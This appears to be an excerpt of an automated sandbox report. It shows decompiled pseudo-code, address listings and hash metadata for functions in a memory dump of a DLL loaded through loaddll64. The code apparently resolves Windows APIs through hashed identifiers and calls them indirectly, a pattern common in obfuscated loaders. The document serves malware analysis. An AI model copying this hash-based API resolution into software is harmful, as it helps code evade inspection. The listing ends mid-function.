                          				goto 0xd371821b;
                          				HeapFree(_t131, ??);
                          				goto 0xd371821b;
                          				goto 0xd371821b;
                          				goto 0xd371821b;
                          				E0000027E27ED371908C(0xd97160e4, _t104,  *((intOrPtr*)( *((intOrPtr*)( *0xd371d458 + 8)) + 0x18)));
                          				if (_t104 == 0) goto 0xd37180e2;
                          				 *_t104();
                          				goto 0xd371821b;
                          				r12d = 1;
                          				if ( *(_t141 + 0x50) == 0) goto 0xd371814a;
                          				E0000027E27ED371908C(0xf2d20ec6, _t104,  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) + 0x18)));
                          				if (_t104 == 0) goto 0xd3718139;
                          				 *_t104();
                          				goto 0xd371813e;
                          				if (r9d == 0) goto 0xd37180bf;
                          				E0000027E27ED37185CC(r9d,  *(_t141 + 0x50), _t104,  *((intOrPtr*)( *0xd371d458 + 8)), _t156);
                          				_t134 = _t104;
                          				if (_t104 == 0) goto 0xd37180b5;
                          				goto 0xd371807a;
                          				asm("sbb ebx, ebx");
                          				goto 0xd371814f;
                          				if (r12d == 0) goto 0xd371821b;
                          				if (0x426 != 0x426) goto 0xd371821b;
                          				if (_t134 == 0) goto 0xd37181be;
                          				if ( *_t134 == 0) goto 0xd37181be;
                          				0xd371487a();
                          				if (E0000027E27ED3715448(_t104,  *(_t141 + 0x50), _t134, _t144 + 0x30, _t137, _t141) != 0) goto 0xd37181bc;
                          				if (E0000027E27ED371672C(_t134, _t144 + 0x30, _t144 + 0x68) == 0) goto 0xd37181be;
                          				asm("ror ax, 0x8");
                          				 *((short*)(_t144 + 0x32)) =  *(_t144 + 0x68) & 0x0000ffff;
                          				r12d = 1;
                          				if (0 != 0) goto 0xd371821b;
                          				if ( *(_t141 + 0x50) == 0) goto 0xd37181fb;
                          				 *(_t141 + 0x50) =  *(_t141 + 0x50) & 0x00000000;
                          				E0000027E27ED3712874( *((intOrPtr*)( *0xd371d458 + 8)),  *(_t141 + 0x50), _t134,  *(_t141 + 0x50));
                          				HeapFree(??, ??, ??);
                          				goto 0xd3718200;
                          				if (r12d == 0) goto 0xd371821b;
                          				_t27 = _t144 + 0x30; // 0x31
                          				_t66 = E0000027E27ED3719214( *((intOrPtr*)( *0xd371d458 + 8)), _t27, _t134,  *(_t141 + 0x50), _t141,  *((intOrPtr*)(_t141 + 0x38)), _t141 + 0x50);
                          				if ( *((long long*)(_t144 + 0x80)) == 0) goto 0xd3718241;
                          				if (_t66 == 0x3e5) goto 0xd3718241;
                          				r8d = _t66;
                          				E0000027E27ED3716AC0( *0xd371d458,  *((intOrPtr*)( *0xd371d458 + 8)), _t141,  *((intOrPtr*)(_t144 + 0x80)),  *(_t141 + 0x50), _t141);
                          				return _t66;
                          			}















                          0x27ed3717fd4
                          0x27ed3717fd4
                          0x27ed3717fd4
                          0x27ed3717fd9
                          0x27ed3717fde
                          0x27ed3717fe8
                          0x27ed3717fec
                          0x27ed3717ff3
                          0x27ed3717ffd
                          0x27ed3718004
                          0x27ed3718007
                          0x27ed3718011
                          0x27ed371801c
                          0x27ed3718027
                          0x27ed3718032
                          0x27ed371803d
                          0x27ed3718048
                          0x27ed371804f
                          0x27ed3718056
                          0x27ed371805e
                          0x27ed3718066
                          0x27ed3718071
                          0x27ed3718082
                          0x27ed3718096
                          0x27ed371809d
                          0x27ed37180aa
                          0x27ed37180b0
                          0x27ed37180ba
                          0x27ed37180c4
                          0x27ed37180d2
                          0x27ed37180da
                          0x27ed37180e0
                          0x27ed37180e4
                          0x27ed37180e9
                          0x27ed37180f6
                          0x27ed3718101
                          0x27ed3718109
                          0x27ed3718111
                          0x27ed3718113
                          0x27ed3718118
                          0x27ed3718120
                          0x27ed3718125
                          0x27ed371812b
                          0x27ed3718134
                          0x27ed3718140
                          0x27ed3718148
                          0x27ed3718152
                          0x27ed371815e
                          0x27ed371816c
                          0x27ed3718171
                          0x27ed3718185
                          0x27ed3718199
                          0x27ed37181ac
                          0x27ed37181b3
                          0x27ed37181b7
                          0x27ed37181be
                          0x27ed37181c6
                          0x27ed37181cf
                          0x27ed37181d1
                          0x27ed37181e4
                          0x27ed37181f1
                          0x27ed37181f9
                          0x27ed3718203
                          0x27ed371820d
                          0x27ed3718219
                          0x27ed3718224
                          0x27ed371822c
                          0x27ed3718236
                          0x27ed371823c
                          0x27ed371825b

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID: ))8M$6$H$lJu
                          • API String ID: 3298025750-2816507560
                          • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                          • Instruction ID: bcd9ba44b9ccaaf2146741dbc99a756ae0e5dd287d7a474d7ebf37d189273b37
                          • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                          • Instruction Fuzzy Hash: 6161C433208F45D1FFB48B62D8883AB52A9B78E784F1A60A5DE4D477D7DE28C841D320
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E00007FF87FF88C07F964(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
                          				long long _v72;
                          				intOrPtr _v80;
                          				void* _v88;
                          				long long _v96;
                          				long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t33;
                          				void* _t37;
                          				intOrPtr* _t66;
                          				signed long long _t68;
                          				long long _t70;
                          				long long _t72;
                          				long long _t78;
                          				void* _t83;
                          				void* _t90;
                          				long long _t104;
                          				long long _t108;
                          				void* _t110;
                          				intOrPtr* _t112;
                          				void* _t114;
                          				void* _t117;
                          				intOrPtr _t129;
                          				void* _t131;
                          				void* _t132;
                          				signed long long _t133;
                          				signed long long _t134;
                          				signed long long _t137;
                          				intOrPtr* _t138;
                          
                          				_t66 = __rax;
                          				_a8 = __rbx;
                          				_a16 = __rdx;
                          				if (__rdx != 0) goto 0x8c07f9a0;
                          				_t33 = E00007FF87FF88C07E6A0(__rax);
                          				_t3 = _t108 + 0x16; // 0x16
                          				 *__rax = _t3;
                          				E00007FF87FF88C07E580(_t33);
                          				goto 0x8c07fb40;
                          				asm("xorps xmm0, xmm0");
                          				 *((long long*)(__rdx)) = _t108;
                          				asm("movdqu [ebp-0x20], xmm0");
                          				_v72 = _t108;
                          				if ( *__rcx == _t108) goto 0x8c07fa0b;
                          				_a24 = 0x3f2a;
                          				_a26 = dil;
                          				E00007FF87FF88C083218( *__rcx,  &_a24);
                          				if (_t66 != 0) goto 0x8c07f9e2;
                          				r8d = 0;
                          				_t37 = E00007FF87FF88C07FB70(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
                          				goto 0x8c07f9ee;
                          				0x8c07fc80();
                          				r14d = _t37;
                          				if (_t37 != 0) goto 0x8c07f9fe;
                          				goto 0x8c07f9b2;
                          				goto 0x8c07fb04;
                          				_t112 = _v88;
                          				_t129 = _v80;
                          				_a24 = _t108;
                          				_t68 = _t129 - _t112;
                          				_t137 = (_t68 >> 3) + 1;
                          				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
                          				_t134 = _t133 | 0xffffffff;
                          				if (_t90 == 0) goto 0x8c07fa6d;
                          				_t70 = _t134 + 1;
                          				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x8c07fa4e;
                          				if (_t108 + 1 != _t90) goto 0x8c07fa48;
                          				_a24 = _t108 + 1 + _t70;
                          				r8d = 1;
                          				E00007FF87FF88C07D6D0(_t137, _t108 + 1 + _t70, _t108 + 1);
                          				_t78 = _t70;
                          				if (_t70 == 0) goto 0x8c07fafd;
                          				_t104 = _t70 + _t137 * 8;
                          				_t138 = _t112;
                          				_v96 = _t104;
                          				_a32 = _t104;
                          				if (_t112 == _t129) goto 0x8c07faf3;
                          				_v104 = _t78 - _t112;
                          				_t131 = _t134 + 1;
                          				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x8c07faad;
                          				_t132 = _t131 + 1;
                          				if (E00007FF87FF88C083144(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x8c07fb58;
                          				_t72 = _a32;
                          				 *((long long*)(_v104 + _t138)) = _t72;
                          				_a32 = _t72 + _t132;
                          				if (_t138 + 8 != _t129) goto 0x8c07faa7;
                          				r14d = 0;
                          				 *_a16 = _t78;
                          				E00007FF87FF88C07E114(_a16, _v104);
                          				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
                          				if (_t83 == 0) goto 0x8c07fb35;
                          				E00007FF87FF88C07E114(_a16,  *_t112);
                          				if (_t108 + 1 != _t83) goto 0x8c07fb21;
                          				E00007FF87FF88C07E114(_a16, _t112);
                          				return r14d;
                          			}

































                          0x7ff88c07f964
                          0x7ff88c07f964
                          0x7ff88c07f969
                          0x7ff88c07f988
                          0x7ff88c07f98a
                          0x7ff88c07f98f
                          0x7ff88c07f992
                          0x7ff88c07f994
                          0x7ff88c07f99b
                          0x7ff88c07f9a0
                          0x7ff88c07f9a3
                          0x7ff88c07f9a9
                          0x7ff88c07f9ae
                          0x7ff88c07f9b2
                          0x7ff88c07f9bb
                          0x7ff88c07f9c1
                          0x7ff88c07f9c5
                          0x7ff88c07f9d0
                          0x7ff88c07f9d6
                          0x7ff88c07f9db
                          0x7ff88c07f9e0
                          0x7ff88c07f9e9
                          0x7ff88c07f9ee
                          0x7ff88c07f9f3
                          0x7ff88c07f9fc
                          0x7ff88c07fa06
                          0x7ff88c07fa0b
                          0x7ff88c07fa12
                          0x7ff88c07fa1c
                          0x7ff88c07fa20
                          0x7ff88c07fa2d
                          0x7ff88c07fa3b
                          0x7ff88c07fa3f
                          0x7ff88c07fa46
                          0x7ff88c07fa4e
                          0x7ff88c07fa55
                          0x7ff88c07fa67
                          0x7ff88c07fa69
                          0x7ff88c07fa6d
                          0x7ff88c07fa79
                          0x7ff88c07fa7e
                          0x7ff88c07fa84
                          0x7ff88c07fa86
                          0x7ff88c07fa8a
                          0x7ff88c07fa8d
                          0x7ff88c07fa94
                          0x7ff88c07fa9b
                          0x7ff88c07faa3
                          0x7ff88c07faad
                          0x7ff88c07fab4
                          0x7ff88c07fab9
                          0x7ff88c07facd
                          0x7ff88c07fad3
                          0x7ff88c07fadf
                          0x7ff88c07faea
                          0x7ff88c07faf1
                          0x7ff88c07faf7
                          0x7ff88c07fafa
                          0x7ff88c07faff
                          0x7ff88c07fb18
                          0x7ff88c07fb1f
                          0x7ff88c07fb24
                          0x7ff88c07fb33
                          0x7ff88c07fb38
                          0x7ff88c07fb57

                          APIs
                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF88C07F994
                            • Part of subcall function 00007FF88C07E5A0: IsProcessorFeaturePresent.KERNEL32(00007FF88C080B95), ref: 00007FF88C07E5A9
                            • Part of subcall function 00007FF88C07E5A0: GetCurrentProcess.KERNEL32(00007FF88C080B95), ref: 00007FF88C07E5CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                          • String ID: *?$.
                          • API String ID: 4036615347-3972193922
                          • Opcode ID: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                          • Instruction ID: 100939bfa5983ec9180eb91ef71791c8c740c5b9116cce3bc6e37a4d42781363
                          • Opcode Fuzzy Hash: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                          • Instruction Fuzzy Hash: CF510262B15B9A85EF18DFA6D8010BD67A4FB69BD8B448532DE1D17B89EF3DD042C300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 24%
                          			E0000027E27ED37131C0(long long __rbx, intOrPtr* __rcx, long long* __rdx, void* __r9) {
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t110;
                          				long long* _t130;
                          				long long* _t131;
                          				long long* _t132;
                          				long long* _t133;
                          				long long* _t134;
                          				void* _t163;
                          				void* _t164;
                          				intOrPtr* _t165;
                          				void* _t167;
                          				void* _t170;
                          				long long* _t172;
                          				void* _t174;
                          				void* _t175;
                          				void* _t177;
                          				long _t188;
                          				void* _t191;
                          				void* _t194;
                          				void* _t197;
                          
                          				_t134 = __rbx;
                          				 *((long long*)(_t174 + 0x10)) = __rbx;
                          				 *((intOrPtr*)(_t174 + 0x20)) = r9d;
                          				 *((intOrPtr*)(_t174 + 0x18)) = r8d;
                          				_t175 = _t174 - 0x50;
                          				_t168 =  *__rcx;
                          				_t130 = __rdx;
                          				_t165 = __rcx;
                          				E0000027E27ED3716C34(__rbx, __rdx, __rcx,  *__rcx, _t170, _t177, _t197, _t194);
                          				if (_t130 == _t134) goto 0xd3713469;
                          				_t110 =  *((char*)(_t165 + 0x75)) - 6;
                          				_t6 = _t134 + 4; // 0x4
                          				r12d = _t6;
                          				if (_t110 > 0) goto 0xd371322c;
                          				if (_t110 != 0) goto 0xd3713223;
                          				if ( *((char*)(_t165 + 0x74)) - 2 > 0) goto 0xd371322c;
                          				 *((intOrPtr*)(_t175 + 0x90)) = 0;
                          				goto 0xd3713234;
                          				 *((intOrPtr*)(_t175 + 0x90)) = r12d;
                          				E0000027E27ED371908C(0x3fe3c8ba, _t130,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t130 == _t134) goto 0xd371325f;
                          				r9d = 0;
                          				r8d = 0;
                          				 *((intOrPtr*)(_t175 + 0x20)) = 0;
                          				 *_t130();
                          				goto 0xd3713262;
                          				_t131 = _t134;
                          				 *((long long*)(_t165 + 0x28)) = _t131;
                          				HeapFree(_t191, _t188, _t164);
                          				if ( *((intOrPtr*)(_t165 + 0x28)) == _t134) goto 0xd3713469;
                          				if ( *((intOrPtr*)(_t175 + 0xa0)) == 0) goto 0xd37132be;
                          				E0000027E27ED371908C(0xe7f09937, _t131,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t131 == _t134) goto 0xd37132b4;
                          				_t18 = _t175 + 0xa0; // -14
                          				r9d = r12d;
                          				 *_t131();
                          				goto 0xd37132b6;
                          				if (0 == 0) goto 0xd3713469;
                          				E0000027E27ED3716C34(_t134,  *((intOrPtr*)(_t165 + 8)), _t165, _t168, _t130, _t18, _t167, _t170);
                          				if (_t131 == _t134) goto 0xd3713469;
                          				 *((intOrPtr*)(_t175 + 0x90)) = 0x100;
                          				if ( *((intOrPtr*)(_t175 + 0xb0)) == 0) goto 0xd3713326;
                          				 *((intOrPtr*)(_t175 + 0x40)) = 0xaa0;
                          				E0000027E27ED371908C(0xe7f09937, _t131,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t131 == _t134) goto 0xd3713316;
                          				r9d = 4;
                          				 *_t131();
                          				asm("bts dword [esp+0x90], 0x17");
                          				goto 0xd371332b;
                          				E0000027E27ED371908C(0x7dda0345, _t131,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t131 == _t134) goto 0xd3713350;
                          				r9d = 0;
                          				r8d = 0x50;
                          				 *_t131();
                          				goto 0xd3713353;
                          				_t132 = _t134;
                          				 *((long long*)(_t165 + 0x30)) = _t132;
                          				HeapFree(??, ??, ??);
                          				if ( *((intOrPtr*)(_t165 + 0x30)) == _t134) goto 0xd3713469;
                          				E0000027E27ED3716C34(_t134,  *((intOrPtr*)(_t165 + 0x10)), _t165, _t168, _t130, _t131);
                          				_t172 = _t132;
                          				if (_t132 == _t134) goto 0xd3713469;
                          				E0000027E27ED371908C(0xaa9d9fc1, _t132,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t132 == _t134) goto 0xd37133de;
                          				_t163 =  !=  ?  *0xd371d448 + 0x27ed3721250 :  *0xd371d448 + 0x27ed3721268;
                          				r9d = 0;
                          				 *((intOrPtr*)(_t175 + 0x30)) =  *((intOrPtr*)(_t175 + 0x90));
                          				 *((long long*)(_t175 + 0x28)) = _t134;
                          				 *((long long*)(_t175 + 0x20)) = _t134;
                          				 *_t132();
                          				goto 0xd37133e1;
                          				_t133 = _t134;
                          				 *((long long*)(_t165 + 0x38)) = _t133;
                          				HeapFree(??, ??, ??);
                          				if ( *((intOrPtr*)(_t165 + 0x38)) == _t134) goto 0xd3713469;
                          				 *((intOrPtr*)(_t175 + 0x44)) = 4;
                          				E0000027E27ED371908C(0x677ec78c, _t133,  *((intOrPtr*)(_t168 + 0x48)));
                          				_t48 = _t172 + 0x1b; // 0x1f
                          				r12d = _t48;
                          				if (_t133 == _t134) goto 0xd3713431;
                          				 *_t133();
                          				goto 0xd3713433;
                          				if (0 == 0) goto 0xd3713487;
                          				asm("bts dword [esp+0x90], 0x8");
                          				E0000027E27ED371908C(0xe7f09937, _t133,  *((intOrPtr*)(_t168 + 0x48)));
                          				if (_t133 == _t134) goto 0xd3713487;
                          				r9d = 4;
                          				 *_t133();
                          				goto 0xd3713487;
                          				E0000027E27ED371908C(0xc06f8334, _t133,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t133 == _t134) goto 0xd3713482;
                          				 *_t133();
                          				goto 0xd3713487;
                          				return 0x7f;
                          			}

























                          0x27ed37131c0
                          0x27ed37131c0
                          0x27ed37131c5
                          0x27ed37131ca
                          0x27ed37131da
                          0x27ed37131e5
                          0x27ed37131f3
                          0x27ed37131f6
                          0x27ed37131fe
                          0x27ed371320b
                          0x27ed3713211
                          0x27ed3713215
                          0x27ed3713215
                          0x27ed3713219
                          0x27ed371321b
                          0x27ed3713221
                          0x27ed3713223
                          0x27ed371322a
                          0x27ed371322c
                          0x27ed371323d
                          0x27ed3713245
                          0x27ed371324e
                          0x27ed3713251
                          0x27ed3713257
                          0x27ed371325b
                          0x27ed371325d
                          0x27ed371325f
                          0x27ed371326a
                          0x27ed371326e
                          0x27ed3713278
                          0x27ed371328a
                          0x27ed3713292
                          0x27ed371329a
                          0x27ed37132a0
                          0x27ed37132a8
                          0x27ed37132b0
                          0x27ed37132b2
                          0x27ed37132b8
                          0x27ed37132c4
                          0x27ed37132cf
                          0x27ed37132d5
                          0x27ed37132e7
                          0x27ed37132ef
                          0x27ed37132f7
                          0x27ed37132ff
                          0x27ed3713305
                          0x27ed3713314
                          0x27ed3713316
                          0x27ed3713324
                          0x27ed3713334
                          0x27ed371333c
                          0x27ed3713342
                          0x27ed3713345
                          0x27ed371334c
                          0x27ed371334e
                          0x27ed3713350
                          0x27ed371335b
                          0x27ed371335f
                          0x27ed3713369
                          0x27ed3713375
                          0x27ed371337a
                          0x27ed3713380
                          0x27ed371338f
                          0x27ed3713397
                          0x27ed37133ba
                          0x27ed37133c5
                          0x27ed37133c8
                          0x27ed37133d0
                          0x27ed37133d5
                          0x27ed37133da
                          0x27ed37133dc
                          0x27ed37133de
                          0x27ed37133e9
                          0x27ed37133ed
                          0x27ed37133f7
                          0x27ed3713403
                          0x27ed371340b
                          0x27ed3713410
                          0x27ed3713410
                          0x27ed3713417
                          0x27ed371342d
                          0x27ed371342f
                          0x27ed3713435
                          0x27ed3713437
                          0x27ed3713449
                          0x27ed3713451
                          0x27ed371345f
                          0x27ed3713465
                          0x27ed3713467
                          0x27ed3713472
                          0x27ed371347a
                          0x27ed371347c
                          0x27ed3713480
                          0x27ed37134a0

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc
                          • String ID:
                          • API String ID: 3901518246-0
                          • Opcode ID: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                          • Instruction ID: ba60a90c55df5bd3d909ab46ced4926391e33541c46155c40b7e09e718eb6202
                          • Opcode Fuzzy Hash: bb3dd621c95c53055fcba926f55aa16ae10003733876a93a6dfeee260ac781c3
                          • Instruction Fuzzy Hash: DB819C73708E80D6EE30DF92E4487AAA2A5F78E784F4954658F4E47B86CF38D455C720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 31%
                          			E0000027E27ED371204C(long long __rbx, intOrPtr* __rcx, void* __r8) {
                          				signed long long _t114;
                          				void* _t138;
                          				long _t141;
                          				long long _t144;
                          				signed long long _t146;
                          				signed long long _t148;
                          				void* _t149;
                          				long _t160;
                          				signed long long _t161;
                          				long _t163;
                          				void* _t166;
                          
                          				_t114 = _t148;
                          				 *((long long*)(_t114 + 0x18)) = __rbx;
                          				 *((long long*)(_t114 + 0x20)) = _t144;
                          				_t149 = _t148 - 0x40;
                          				r14d = 0;
                          				 *(_t114 + 0x10) = r14d;
                          				 *(__rcx + 0x5c) = r14d;
                          				if ( *((intOrPtr*)(__rcx + 0x58)) != r14d) goto 0xd3712275;
                          				 *((intOrPtr*)(_t114 + 8)) = 4;
                          				E0000027E27ED371908C(0x5431d47a, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
                          				if (_t114 == _t166) goto 0xd37120af;
                          				 *_t114();
                          				goto 0xd37120b2;
                          				if (r14d == r14d) goto 0xd3712257;
                          				E0000027E27ED371908C(0xbe782669, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
                          				if (_t114 == _t166) goto 0xd37120f6;
                          				_t11 = _t149 + 0x78; // -6
                          				r8d = 0;
                          				 *((long long*)(_t149 + 0x28)) = _t11;
                          				_t14 = _t149 + 0x70; // -14
                          				 *(_t149 + 0x20) = _t14;
                          				 *_t114();
                          				goto 0xd37120f9;
                          				if (r14d == r14d) goto 0xd3712257;
                          				 *(_t149 + 0x78) = r14d;
                          				 *(_t149 + 0x70) = r14d;
                          				E0000027E27ED371908C(0xbe782669, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
                          				if (_t114 == _t166) goto 0xd3712143;
                          				_t20 = _t149 + 0x78; // -6
                          				r9d = 0;
                          				r8d = 0;
                          				 *((long long*)(_t149 + 0x28)) = _t20;
                          				_t22 = _t149 + 0x70; // -14
                          				 *(_t149 + 0x20) = _t22;
                          				 *_t114();
                          				r8d =  *(_t149 + 0x70);
                          				HeapAlloc(_t166, _t163, _t160);
                          				_t161 = _t114;
                          				if (_t114 == _t166) goto 0xd3712250;
                          				E0000027E27ED371908C(0xbe782669, _t114,  *((intOrPtr*)( *__rcx + 0x48)));
                          				if (_t114 == _t166) goto 0xd371219c;
                          				_t28 = _t149 + 0x78; // -6
                          				r8d = 0;
                          				 *((long long*)(_t149 + 0x28)) = _t28;
                          				_t30 = _t149 + 0x70; // -14
                          				 *(_t149 + 0x20) = _t30;
                          				 *_t114();
                          				goto 0xd371219f;
                          				if (r14d == r14d) goto 0xd3712222;
                          				 *(_t149 + 0x70) =  *(_t149 + 0x70) >> 1;
                          				 *((intOrPtr*)(_t161 + _t114 * 2)) = r14w;
                          				r8d =  *(_t149 + 0x70);
                          				HeapAlloc(_t138, _t141);
                          				_t146 = _t114;
                          				if (_t114 == _t166) goto 0xd371221b;
                          				E0000027E27ED371908C(0x880a500a, _t114,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t114 == _t166) goto 0xd3712210;
                          				r9d =  *(_t149 + 0x70);
                          				 *(_t149 + 0x38) = _t166;
                          				 *(_t149 + 0x30) = _t166;
                          				 *((intOrPtr*)(_t149 + 0x28)) = _t161 + 1;
                          				 *(_t149 + 0x20) = _t146;
                          				 *(_t149 + 0x70) =  *_t114();
                          				goto 0xd3712215;
                          				 *(_t149 + 0x70) = r14d;
                          				 *(__rcx + 0x20) = _t146;
                          				goto 0xd3712240;
                          				goto 0xd3712240;
                          				E0000027E27ED371908C(0xc06f8334, _t114,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t114 == _t166) goto 0xd371223b;
                          				 *_t114();
                          				goto 0xd3712240;
                          				HeapFree(??, ??, ??);
                          				goto 0xd3712275;
                          				goto 0xd3712275;
                          				E0000027E27ED371908C(0xc06f8334, _t114,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t114 == _t166) goto 0xd3712270;
                          				 *_t114();
                          				goto 0xd3712275;
                          				return 0x7f;
                          			}














                          0x27ed371204c
                          0x27ed371204f
                          0x27ed3712053
                          0x27ed371205f
                          0x27ed3712074
                          0x27ed371207a
                          0x27ed371207e
                          0x27ed3712085
                          0x27ed371208b
                          0x27ed371209b
                          0x27ed37120a3
                          0x27ed37120ab
                          0x27ed37120ad
                          0x27ed37120b5
                          0x27ed37120c4
                          0x27ed37120cc
                          0x27ed37120ce
                          0x27ed37120d7
                          0x27ed37120da
                          0x27ed37120df
                          0x27ed37120e9
                          0x27ed37120f2
                          0x27ed37120f4
                          0x27ed37120fc
                          0x27ed3712102
                          0x27ed3712107
                          0x27ed3712115
                          0x27ed371211d
                          0x27ed371211f
                          0x27ed3712124
                          0x27ed3712127
                          0x27ed371212a
                          0x27ed371212f
                          0x27ed3712138
                          0x27ed3712141
                          0x27ed3712143
                          0x27ed3712151
                          0x27ed3712157
                          0x27ed371215d
                          0x27ed371216c
                          0x27ed3712174
                          0x27ed3712176
                          0x27ed371217b
                          0x27ed3712181
                          0x27ed3712186
                          0x27ed371218f
                          0x27ed3712198
                          0x27ed371219a
                          0x27ed37121a2
                          0x27ed37121af
                          0x27ed37121b3
                          0x27ed37121b8
                          0x27ed37121c0
                          0x27ed37121c6
                          0x27ed37121cc
                          0x27ed37121d7
                          0x27ed37121e2
                          0x27ed37121e4
                          0x27ed37121e9
                          0x27ed37121ee
                          0x27ed37121fc
                          0x27ed3712202
                          0x27ed371220a
                          0x27ed371220e
                          0x27ed3712210
                          0x27ed3712215
                          0x27ed3712219
                          0x27ed3712220
                          0x27ed371222b
                          0x27ed3712233
                          0x27ed3712235
                          0x27ed3712239
                          0x27ed3712248
                          0x27ed371224e
                          0x27ed3712255
                          0x27ed3712260
                          0x27ed3712268
                          0x27ed371226a
                          0x27ed371226e
                          0x27ed371228f

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Alloc$ErrorFreeLast
                          • String ID:
                          • API String ID: 861356407-0
                          • Opcode ID: 0d16cc31d8c4b20fd9f3a2fec83417e35b9a07ea40dd460ae92dda63533fb1d6
                          • Instruction ID: 75ede8f981e908ae4d110b9c64f0da2d6b12782331ff92239fe0e6c43e4d9a88
                          • Opcode Fuzzy Hash: 0d16cc31d8c4b20fd9f3a2fec83417e35b9a07ea40dd460ae92dda63533fb1d6
                          • Instruction Fuzzy Hash: C3518E32708A44C7EF70CFA6E44466EA6A4F78D7C0F261151EA8D53BA6CE38D5928B10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 29%
                          			E0000027E27ED37134A4(long long __rbx, long long __rcx, signed long long __rdx, long long __r8, long long _a8, signed int _a16, char _a24, long long _a32) {
                          				long long _v72;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t28;
                          				intOrPtr _t29;
                          				signed short _t31;
                          				void* _t33;
                          				signed short _t50;
                          				signed short _t51;
                          				signed short _t55;
                          				signed long long _t88;
                          				signed long long _t97;
                          				signed long long _t106;
                          				void* _t109;
                          				signed long long _t110;
                          				intOrPtr* _t111;
                          				void* _t112;
                          				void* _t113;
                          				long long _t116;
                          				void* _t117;
                          				void* _t118;
                          				long long _t123;
                          				signed long long _t124;
                          				void* _t130;
                          
                          				_t123 = __r8;
                          				_t106 = __rdx;
                          				_t89 = __rbx;
                          				_a32 = __rbx;
                          				_a8 = __rcx;
                          				_t88 = __rdx;
                          				if (__rdx == _t109) goto 0xd371369e;
                          				if ( *__rdx == dil) goto 0xd371369e;
                          				E0000027E27ED3716C34(__rbx, __rdx, _t109, _t113, _t118, __r8);
                          				if (_t88 == _t109) goto 0xd3713699;
                          				E0000027E27ED37197A0(0, _t88, _t89, _t113, _t118, __r8);
                          				r8d = 0;
                          				_t119 = _t88;
                          				if (_t88 == _t123) goto 0xd3713684;
                          				r12d = _a16 & 0x0000ffff;
                          				_t110 = _t88;
                          				_t28 =  *_t110 & 0x0000ffff;
                          				if (_t28 == r8w) goto 0xd371353e;
                          				if (_t28 == 0x7c) goto 0xd3713538;
                          				_t29 =  *((intOrPtr*)(_t110 + 2));
                          				if (_t29 != r8w) goto 0xd3713525;
                          				if (_t29 != r8w) goto 0xd3713541;
